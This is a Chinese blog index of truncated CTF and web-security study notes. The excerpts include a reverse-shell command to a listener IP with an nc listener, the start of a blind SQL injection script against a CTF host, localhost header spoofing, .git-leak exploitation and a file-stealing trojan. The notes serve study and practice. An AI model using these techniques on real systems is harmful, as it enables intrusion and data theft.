随笔分类 - 网络安全学习笔记-02
摘要:目录: 第一部分: 1、 file_get_contents() 、file_put_contents()本身就是PHP函数,它们可以直接运行,不是一定要与eval等函数一起才可以用,但是它自身不带输出功能 若是在用户可以控制执行的函数和测试,类似php中的$a(b)这种,若是它将eval、asse
阅读全文
摘要:目录: 第一部分: 布尔盲注类型: import requests url="http://32a87616-b3a4-4290-808b-9c3d3e1163d2.node4.buuoj.cn:81/index.php" for changdu in range(1,100): for neir
阅读全文
摘要:目录: 第一部分 1、strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。 strstr(string,search,before_search) 参数 描述 string 必需。规定被搜索的字符串。 search 必需。规定要搜索的字符串。
阅读全文
摘要:目录: 第一部分 1、Githack : 当前大量开发人员使用git进行版本控制,对站点自动部署。 如果配置不当,可能会将.git文件夹(该文件夹中可能含有该网站的全部源文件)直接部署到线上环境。这就引起了git泄露漏洞。 GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,
阅读全文
摘要:目录: 第一部分 第二部分 第三部分 第一部分 1、若是网页显示只允许内网连接(或是只有自己能看到等类似说法),则可以尝试抓包,然后在HTTP的头部添加,因为它可能是检查X-Real-IP字段或是X-Forwarded-For字段 X-Real-IP:127.0.0.1 或是 localhostX-
阅读全文
摘要:目录: 第一部分: 1、摆渡木马是一种特殊的木马,其感染机制与 U 盘病毒的传播机制完全一样,只是感染目标计算机后,它会尽量隐蔽自己的踪迹,不会出现普通 U 盘病毒感染后的症状,如更改盘符图标、破坏系统数据、在弹出菜单中添加选项等,它唯一的动作就是扫描系统中的文件数据,利用关键字匹配等手段将敏感文件
阅读全文
摘要:目录 第一部分 第一部分 1、shell反弹 在kali中监听对应端口 nc -lvvp 9999(对应端口) 在目标主机中写入反弹命令 bash -i >& /dev/tcp/192.168.199.129/9999 0>&1 反弹shell命令详解: bash -i #bash是一个与sh兼容的
阅读全文
摘要:linux学习网站https://www.linuxprobe.com/ www.insecam.org : 一个可以看到世界各国被黑的监控摄像头内容的网站(需要FQ)cybermap.lcaspersky.com :一个实时监控全球大多数网络攻击的网站国家互联网应急中心 :一个可以查看网络攻击的网
阅读全文
